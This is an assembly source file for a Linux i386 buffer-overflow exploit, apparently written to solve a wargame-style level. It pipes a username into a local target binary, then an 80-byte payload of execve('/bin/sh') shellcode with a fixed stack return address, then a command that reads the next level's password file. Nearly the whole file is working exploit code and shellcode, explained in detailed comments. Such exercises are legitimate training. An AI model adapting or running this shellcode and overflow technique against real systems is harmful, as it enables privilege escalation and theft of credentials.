; exploit_01.asm — flat assembler (FASM, Intel syntax), Linux i386 ELF executable.
;
; Harness for a stack-smashing exploit against a local target binary: it creates a
; pipe, attaches the read end to stdin, forks, execve()s the target in the child and,
; from the parent, feeds three lines into the pipe one second apart — a username, the
; overflow payload (shellcode + hard-coded return address, see _payload) and a shell
; command. Every kernel call is a raw int $80 with the i386 ABI (eax = syscall number,
; arguments in ebx, ecx, edx; result in eax, a negative value on failure).
; Because the return address in _payload is a fixed stack address, the whole thing is
; tied to one target build and one runtime environment (see the notes at _payload).
;
; The $03 after "executable" is FASM's ELF OS-ABI selector (3 = GNU/Linux).
format ELF executable $03
entry _start
; string NAME "bytes", ... — emits the given bytes under the label NAME and defines
; NAME.length as their byte count. Nothing is appended (no NUL, no newline), so the
; caller supplies any line terminator it needs; used for the write() buffers below.
struc string data*& {
.: db data
.length = ($ - .)
}
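; struct timespec as the i386 int $80 ABI lays it out: two 32-bit longs, 8 bytes in
; total — the kernel reads tv_sec at offset 0 and tv_nsec at offset 4.
; (The fields used to be reserved as 64-bit quadwords, which put tv_nsec at offset 8
; where nanosleep() never looks; the call still worked only because the block was
; zero-filled, and a future write to .tv_nsec would have been silently ignored.)
struc timespec {
.tv_sec: rd $01
.tv_nsec: rd $01
}
; Instantiate the struct at address 0 inside a virtual block so that the field offsets
; (timespec.tv_sec, timespec.tv_nsec) and the total size (timespec.sizeof) become
; assemble-time constants without emitting any bytes.
virtual at $00
timespec timespec
timespec.sizeof = $
end virtual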
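; Linux i386 syscall numbers for the int $80 ABI (eax = number; args in ebx, ecx, edx).
SYS_exit      = $01
SYS_fork      = $02
SYS_write     = $04
SYS_close     = $06
SYS_execve    = $0B
SYS_pipe      = $2A
SYS_dup2      = $3F
SYS_nanosleep = $A2

segment executable readable
;-----------------------------------------------------------------------
; _start — program entry point (no caller; only the kernel ABI applies).
;
; Stack layout inside _start:
;   [esp]   = pipefd[0], read end
;   [esp+4] = pipefd[1], write end
;   (the parent later pushes a timespec below them, so it addresses the
;    descriptors as [esp+timespec.sizeof+...])
;
; Parent: writes _username, _payload and _command into the pipe, each
;         separated by nanosleep(1s), then exits; exiting closes its copy
;         of the write end, which is what finally delivers EOF to the
;         shell the payload spawns.
; Child:  closes its own copy of the write end and execve()s _program
;         with stdin already attached to the read end.
;
; Error handling is minimal: a failed pipe() or fork() goes straight to
; .exit, a failed execve() falls through to .exit, and the exit status
; is 0 in every case, so failures are not visible to the caller.
;-----------------------------------------------------------------------
_start:
        and     esp, not $0F
        sub     esp, $08                ; int pipefd[2] at [esp]
        mov     eax, SYS_pipe
        mov     ebx, esp
        int     $80
        test    eax, eax
        jnz     .exit                   ; pipe() failed (negative eax)

        ; The first line is queued before the target even exists; it waits
        ; in the pipe buffer until the target reads its stdin.
        mov     eax, SYS_write
        mov     ebx, dword [esp+$04]
        mov     ecx, _username
        mov     edx, _username.length
        int     $80

        ; fd 0 := read end. Done before fork() so the child (and, through
        ; execve, the target) inherits it as stdin.
        mov     eax, SYS_dup2
        mov     ebx, dword [esp]
        xor     ecx, ecx
        int     $80

        mov     eax, SYS_fork
        int     $80
        test    eax, eax
        jz      .child
        js      .exit                   ; fork() failed: nothing to drive

        ; ---- parent ----
        ; Zeroed timespec {tv_sec = 1, tv_nsec = 0} on the stack. The two
        ; nanosleep()s are the only sequencing between the lines we send:
        ; this assumes the target consumes each line within a second.
        sub     esp, timespec.sizeof
        xor     eax, eax
        mov     edi, esp
        mov     ecx, timespec.sizeof
        cld
        rep     stosb
        mov     byte [esp+timespec.tv_sec], $01

        mov     eax, SYS_nanosleep
        mov     ebx, esp
        xor     ecx, ecx                ; rem = NULL
        int     $80

        mov     eax, SYS_write          ; second line: the overflow payload
        mov     ebx, dword [esp+timespec.sizeof+$04]
        mov     ecx, _payload
        mov     edx, _payload.length
        int     $80

        mov     eax, SYS_nanosleep
        mov     ebx, esp
        xor     ecx, ecx
        int     $80

        mov     eax, SYS_write          ; third line: command for the spawned shell
        mov     ebx, dword [esp+timespec.sizeof+$04]
        mov     ecx, _command
        mov     edx, _command.length
        int     $80
        jmp     .exit                   ; exit() closes our write end -> EOF downstream

.child:
        ; Drop the child's copy of the write end. pipe() was called without
        ; O_CLOEXEC, so it survives execve; if the target kept it open, its
        ; stdin would always have a live writer and would never reach EOF
        ; after the parent exits, leaving the spawned shell blocked forever.
        mov     eax, SYS_close
        mov     ebx, dword [esp+$04]
        int     $80

        ; execve(_program, [_program, NULL], NULL)
        mov     eax, SYS_execve
        mov     ebx, _program
        xor     edx, edx                ; envp = NULL
        push    edx                     ; argv[1] = NULL
        push    ebx                     ; argv[0] = _program
        mov     ecx, esp                ; argv
        int     $80
        ; only reached if execve() failed; fall through and exit quietly

.exit:
        mov     eax, SYS_exit
        xor     ebx, ebx                ; status 0 on every path (see header)
        int     $80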
; Read-only data: the three lines written into the target's stdin, plus the execve path.
; The payload bytes are never executed from here; they only run once the target has
; copied them onto its own stack.
segment readable
; Line 1 — written to the pipe before the target is started.
_username string "dat_wil", $0A
; Line 3 — read and executed by the /bin/sh that the payload spawns.
_command string "cat /home/users/level02/.pass", $0A
; NUL-terminated path for execve() in the child; the same pointer is used as argv[0].
; Not declared with the string struc because it needs the terminator and no length.
_program: db "/home/users/level01/level01", $00
; Line 2 — the overflow: $50 (80) bytes of shellcode and filler, a 4-byte address,
; and a newline. Total length is _payload.length, computed at the end.
_payload:
jmp short _init                     ; jmp/call pattern: the call below leaves the string address on the stack
_next:
mov ecx, esp                        ; ecx = argv -> { address of "/bin/sh", NULL } (the two values pushed below)
mov ebx, dword [esp]                ; ebx = filename = address of "/bin/sh"
xor byte [ebx+$07], $FF             ; turn the $FF placeholder after "/bin/sh" (index 7) into the NUL terminator at run time; keeps a 0x00 out of the payload bytes, presumably because a NUL would cut the target's input read short — confirm against the target
xor eax, eax
mov al, $0B                         ; execve; the two-byte form avoids the zero bytes a 32-bit immediate would carry
int $80                             ; edx (envp) is still 0 from _init — nothing in between touches it
_init:
xor edx, edx
push edx                            ; argv[1] = NULL (also leaves edx = 0 for envp)
call _next                          ; pushes the address of the bytes that follow = argv[0]
db "/bin/sh", $FF                   ; 7 characters plus the placeholder byte patched by the xor above
times ($50-($-_payload)) db '_'     ; pad to $50 bytes so the dword below lands $50 bytes into the target's buffer — presumably the distance to its saved return address; verify against the target's frame
dd $FFFFDE0C                        ; little-endian overwrite value: a fixed 0xFFFFxxxx address, i.e. presumably where this payload sits on the target's stack; relies on no ASLR and an executable stack — TODO confirm for the target environment
db $0A                              ; trailing newline, presumably to end the target's line-oriented read — confirm
_payload.length = ($ - _payload)